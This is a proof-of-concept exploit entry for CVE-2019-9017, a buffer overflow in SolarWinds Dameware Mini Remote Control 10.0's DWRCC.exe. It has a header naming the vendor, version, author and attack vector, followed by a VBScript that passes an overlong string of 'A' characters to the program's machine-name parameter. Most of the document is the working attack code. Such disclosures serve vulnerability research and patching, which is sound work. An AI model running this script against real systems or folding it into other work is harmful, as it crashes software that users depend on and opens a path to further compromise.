#Vendor: Solarwinds #Site Vendor: https://www.dameware.com/ #Product: Dameware Mini Remote Control #Version: 10.0 x64 #Platform: Windows #Tested on: Windows 7 SP1 x64 #Dscription: The DWRCC executable file is affected by a buffer overflow vulnerability. #The buffer size passed in on the machine name parameter is not checked #Vector: pass buffer to the machine host name parameter #Author: Dino Barlattani dinbar78@gmail.com #Link: http://www.binaryworld.it #CVE ID: CVE-2019-9017 #POC in VB Script option explicit dim fold,exe,buf,i,wsh,fso,result exe = "DWRCC.exe" fold = "C:\program files\SolarWinds\DameWare Mini Remote Control 10.0 x64 #1\" for i = 0 to 300 buf = buf & "A" next set wsh = createobject("wscript.shell") set fso = createobject("scripting.filesystemobject") if fso.folderexists(fold) then fold = fold & exe fold = chr(34) & fold & chr(34) result = wsh.run(fold & " -c: -h: -m:" & buf,0,true) end if